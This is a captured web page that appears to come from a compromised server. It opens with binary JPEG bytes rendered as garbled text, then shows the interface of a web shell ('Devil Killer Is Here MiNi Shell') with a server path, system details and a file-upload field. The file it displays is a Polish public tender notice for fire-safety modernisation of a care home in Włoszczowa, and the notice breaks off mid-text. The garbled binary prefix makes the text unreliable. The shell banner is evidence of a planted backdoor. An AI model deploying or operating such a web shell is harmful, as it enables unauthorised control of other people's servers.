JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240509/0031799101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEPROWADZENIE MODERNIZACJI I DOSTOSOWANIA BUDYNKU DOMU POMOCY SPOŁECZNEJ WE WŁOSZCZOWIE DO WYMOGÓW OCHRONY PRZECIWPOŻAROWEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 292398393</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Koniecpolska 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włoszczowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">29-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">413942038</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpswloszczowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://dpswloszczowa.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEPROWADZENIE MODERNIZACJI I DOSTOSOWANIA BUDYNKU DOMU POMOCY SPOŁECZNEJ WE WŁOSZCZOWIE DO WYMOGÓW OCHRONY PRZECIWPOŻAROWEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-44befaab-0e4a-11ef-9b7e-467806a93518</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00317991</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/925343 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/925343</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">XVII.	KOMUNIKACJA ZAMAWIAJĄCEGO Z WYKONAWCAMI<br/>1.	Komunikacja między Zamawiającymi a Wykonawcami odbywa się za pomocą platformy zakupowej pod adresem: https://platformazakupowa.pl/.<br/>2.	Postępowanie prowadzone jest w języku polskim.<br/>3.	Preferowana jest forma kontaktu Wykonawców z Zamawiającym przy użyciu formularza „Wyślij wiadomość do Zamawiającego” na platformie.<br/>4. Zamawiający dopuszcza możliwość komunikacji przy użyciu poczty elektronicznej pod adresem sekretariat@dpswloszczowa.pl, z zastrzeżeniem, iż dokumenty dotyczące postępowania muszą być składane na platformie zakupowej.<br/>5.	Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pomocą platformy.<br/>6.	Wykonawca zobowiązuje się sprawdzać komunikaty i wiadomości wysyłane na platformie na bieżąco.<br/>7.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowe umożliwiające korzystanie z platformazakupowa.pl:<br/>1)	stały dostęp do sieci Internet o przepustowości co najmniej 256 kbit/s;<br/>2)	przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies”;<br/>3)	platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli;<br/>4)	komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB RAM, procesor Intel IV 2 GHz lub nowszy, system operacyjny MS Windows 7, Mac Os x 10 4, Linux lub ich nowsze wersje;<br/>5)	program obsługujący format plików .pdf, np. Adobe Acrobat Reader;<br/>6)	szyfrowanie na platformie odbywa się za pomocą protokołu TLS 1.3.;<br/>7)	oznaczenie czasu odbioru danych przez platformę stanowi datę oraz dokładny czas generowany wg czasu lokalnego serwera zsynchronizowanego z zegarem Głównego Urzędu Miar.<br/>8.	Decydując się na udział w postępowaniu Wykonawca akceptuje warunki korzystania z platformazakupowa.pl zawarte w Regulaminie zamieszczonym na stronie platformy link.<br/>9.	Wszelkie informacje dla Wykonawców dotyczące udziału w postępowaniu na platformie znajdują się w zakładce „Instrukcje dla Wykonawców” pod linkiem<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/><br/>XVIII.	WSKAZANIE OSÓB UPRAWNIONYCH DO KOMUNIKOWANIA SIĘ Z WYKONAWCAMI<br/>Zamawiający wyznacza osoby do kontaktu z Wykonawcami:<br/>- w kwestiach formalnych - Olga Suliga – 41 39 42 038 wew. 31<br/>- w kwestiach merytorycznych – Maksymilian Stępień – 41 39 42 038 wew. 33 <br/><br/>XIX.	OPIS SPOSOBU PRZYGOTOWANIA I ZAŁOŻENIA OFERTY<br/>1.	Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w jednych z następujących formatów danych: .pdf, .doc, .docx, .rtf, .odt, opatrzona kwalifikowanym podpisem elektroniczny, podpisem zaufanym lub podpisem osobistym.<br/>2.	Zamawiający zaleca aby pliki przesyłane w ramach postępowania przekonwertowane zostały, w miarę możliwości, na format .pdf i opatrzone podpisem kwalifikowanym PAdES.<br/>3.	Oferta powinna zawierać następujące elementy: <br/>1)	Formularz ofertowy, przygotowany wg wzoru stanowiącego załącznik nr 5 do SWZ;<br/>2)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz braku podstaw wykluczenia wg wzoru stanowiącego załącznik nr 1 i 2 do SWZ.<br/>4.	Podpisy kwalifikowane używane przez Wykonawców do podpisywania dokumentów składanych w ramach postępowania muszą być zgodne z wytycznymi zawartymi w „Rozporządzeniu Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 – od 1 lipca 2016 roku”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DPS.ZP.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Część I – Wykonanie instalacji elektrycznej dla Wył PWP<br/>3.	Zakres rzeczowy zamówienia (odpowiednio dla wszystkich części 1-4) obejmuje wszystkie prace, czynności i roboty konieczne dla wykonania zadania inwestycyjnego, w tym następujące elementy:<br/>a) roboty rozbiórkowe i demontażowe;<br/>b) roboty budowlane i odtworzeniowe;<br/>c) roboty elektryczne;<br/>d) roboty montażowe;<br/>e) dostawa niezbędnych materiałów i wyposażenia;<br/>f) badanie i sprawdzenie prawidłowości funkcjonowania zastosowanych systemów i materiałów.<br/><br/>Ponadto, o ile dla wykonania robót budowlanych wchodzących w zakres przedmiotu zamówienia będzie konieczne wykonanie innych prac, czynności lub uzyskanie zezwoleń, to wykonawca wykona te prace i czynności oraz uzyska niezbędne zezwolenia własnym kosztem i staraniem<br/>4.	Wykonawca w ramach realizacji przedmiotu zamówienia nie jest zobowiązany do uzyskania pozwolenia na użytkowanie obiektów budowlanych objętych przedmiotem zamówienia ani do zawiadomienia organu nadzoru budowlanego o zakończeniu budowy.<br/>5.	Szczegółowy zakres zamówienia oraz warunki realizacji (specyfikacja techniczna wykonania i odbioru robót budowlanych) zostały określone w:<br/>a)	Projekcie technicznym zabudowy przeciwpożarowej dla Wyłącznika Prądu dla Domu Pomocy Społecznej we Włoszczowie przy ul. Koniecpolskiej 20 stanowiącym załącznik nr 9 do SWZ. <br/>b)	Przedmiarze robót dotyczących instalacji elektrycznej dla Wył PWP stanowiącym załącznik nr 10 do SWZ.<br/>c)	Projekcie technicznym instalacji elektrycznej wewnętrznej sterowania oddymianiem dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 stanowiącym załącznik nr 11 do SWZ.<br/>d)	Przedmiarze robót instalacji elektrycznej dla oddymiania stanowiącej załącznik nr 12 do SWZ. <br/>e)	Projekcie technicznym instalacji elektrycznej wewnętrznej oświetlenia awaryjnego i ewakuacyjnego dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 , stanowiącym załącznik nr 13 do SWZ.<br/>f)	Przedmiarze robót dla instalacji oświetlenia ewakuacyjnego i awaryjnego stanowiącym załącznik nr 14 do SWZ.<br/>g)	Projekcie dot. Sposobu dostosowania drogi ewakuacyjnej w budynku Domu Pomocy Społecznej we Włoszczowie do aktualnych przepisów przeciwpożarowych dotyczących ewakuacji ludzi z budynku stanowiącym załącznik nr 15 do SWZ.<br/>h)	Przedmiarze robót dotyczących przystosowania klatki schodowej do przepisów p.poż. stanowiącym załącznik nr 16 do SWZ.<br/>6.	Pozostałe warunki realizacji zamówienia zostały określone w Projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 4 do SWZ.<br/>7.	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy<br/>europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Przy składaniu oferty równoważnej wymaganym jest, aby Wykonawca udowodnił Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w projekcie, przedstawiając niezbędną dokumentację potwierdzającą, że zaoferowane materiały/ urządzenia/wyroby zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Część II – Wykonanie instalacji elektrycznej dla oddymiania<br/>3.	Zakres rzeczowy zamówienia (odpowiednio dla wszystkich części 1-4) obejmuje wszystkie prace, czynności i roboty konieczne dla wykonania zadania inwestycyjnego, w tym następujące elementy:<br/>a) roboty rozbiórkowe i demontażowe;<br/>b) roboty budowlane i odtworzeniowe;<br/>c) roboty elektryczne;<br/>d) roboty montażowe;<br/>e) dostawa niezbędnych materiałów i wyposażenia;<br/>f) badanie i sprawdzenie prawidłowości funkcjonowania zastosowanych systemów i materiałów.<br/><br/>Ponadto, o ile dla wykonania robót budowlanych wchodzących w zakres przedmiotu zamówienia będzie konieczne wykonanie innych prac, czynności lub uzyskanie zezwoleń, to wykonawca wykona te prace i czynności oraz uzyska niezbędne zezwolenia własnym kosztem i staraniem<br/>4.	Wykonawca w ramach realizacji przedmiotu zamówienia nie jest zobowiązany do uzyskania pozwolenia na użytkowanie obiektów budowlanych objętych przedmiotem zamówienia ani do zawiadomienia organu nadzoru budowlanego o zakończeniu budowy.<br/>5.	Szczegółowy zakres zamówienia oraz warunki realizacji (specyfikacja techniczna wykonania i odbioru robót budowlanych) zostały określone w:<br/>a)	Projekcie technicznym zabudowy przeciwpożarowej dla Wyłącznika Prądu dla Domu Pomocy Społecznej we Włoszczowie przy ul. Koniecpolskiej 20 stanowiącym załącznik nr 9 do SWZ. <br/>b)	Przedmiarze robót dotyczących instalacji elektrycznej dla Wył PWP stanowiącym załącznik nr 10 do SWZ.<br/>c)	Projekcie technicznym instalacji elektrycznej wewnętrznej sterowania oddymianiem dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 stanowiącym załącznik nr 11 do SWZ.<br/>d)	Przedmiarze robót instalacji elektrycznej dla oddymiania stanowiącej załącznik nr 12 do SWZ. <br/>e)	Projekcie technicznym instalacji elektrycznej wewnętrznej oświetlenia awaryjnego i ewakuacyjnego dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 , stanowiącym załącznik nr 13 do SWZ.<br/>f)	Przedmiarze robót dla instalacji oświetlenia ewakuacyjnego i awaryjnego stanowiącym załącznik nr 14 do SWZ.<br/>g)	Projekcie dot. Sposobu dostosowania drogi ewakuacyjnej w budynku Domu Pomocy Społecznej we Włoszczowie do aktualnych przepisów przeciwpożarowych dotyczących ewakuacji ludzi z budynku stanowiącym załącznik nr 15 do SWZ.<br/>h)	Przedmiarze robót dotyczących przystosowania klatki schodowej do przepisów p.poż. stanowiącym załącznik nr 16 do SWZ.<br/>6.	Pozostałe warunki realizacji zamówienia zostały określone w Projektowanych postanowieniach umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 4 do SWZ.<br/>7.	Jeżeli Wykonawca stwierdzi, że użyte w SWZ i w załącznikach do SWZ normy krajowe lub normy<br/>europejskie lub normy międzynarodowe mogą wskazywać na producentów produktów lub źródła ich pochodzenia to Zamawiający dopuszcza w tym zakresie rozwiązania równoważne. Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. Przy składaniu oferty równoważnej wymaganym jest, aby Wykonawca udowodnił Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w projekcie, przedstawiając niezbędną dokumentację potwierdzającą, że zaoferowane materiały/ urządzenia/wyroby zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">31625100-4 - Systemy wykrywania ognia</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> •	Część III – Wykonanie instalacji dla oświetlenia ewakuacyjnego i awaryjnego<br/>3.	Zakres rzeczowy zamówienia (odpowiednio dla wszystkich części 1-4) obejmuje wszystkie prace, czynności i roboty konieczne dla wykonania zadania inwestycyjnego, w tym następujące elementy:<br/>a) roboty rozbiórkowe i demontażowe;<br/>b) roboty budowlane i odtworzeniowe;<br/>c) roboty elektryczne;<br/>d) roboty montażowe;<br/>e) dostawa niezbędnych materiałów i wyposażenia;<br/>f) badanie i sprawdzenie prawidłowości funkcjonowania zastosowanych systemów i materiałów.<br/><br/>Ponadto, o ile dla wykonania robót budowlanych wchodzących w zakres przedmiotu zamówienia będzie konieczne wykonanie innych prac, czynności lub uzyskanie zezwoleń, to wykonawca wykona te prace i czynności oraz uzyska niezbędne zezwolenia własnym kosztem i staraniem<br/>4.	Wykonawca w ramach realizacji przedmiotu zamówienia nie jest zobowiązany do uzyskania pozwolenia na użytkowanie obiektów budowlanych objętych przedmiotem zamówienia ani do zawiadomienia organu nadzoru budowlanego o zakończeniu budowy.<br/>5.	Szczegółowy zakres zamówienia oraz warunki realizacji (specyfikacja techniczna wykonania i odbioru robót budowlanych) zostały określone w:<br/>a)	Projekcie technicznym zabudowy przeciwpożarowej dla Wyłącznika Prądu dla Domu Pomocy Społecznej we Włoszczowie przy ul. Koniecpolskiej 20 stanowiącym załącznik nr 9 do SWZ. <br/>b)	Przedmiarze robót dotyczących instalacji elektrycznej dla Wył PWP stanowiącym załącznik nr 10 do SWZ.<br/>c)	Projekcie technicznym instalacji elektrycznej wewnętrznej sterowania oddymianiem dla Domu Pomocy Społecznej we Włoszczowie ul. Koniecpolska 20 stanowiącym załącznik nr 11 do 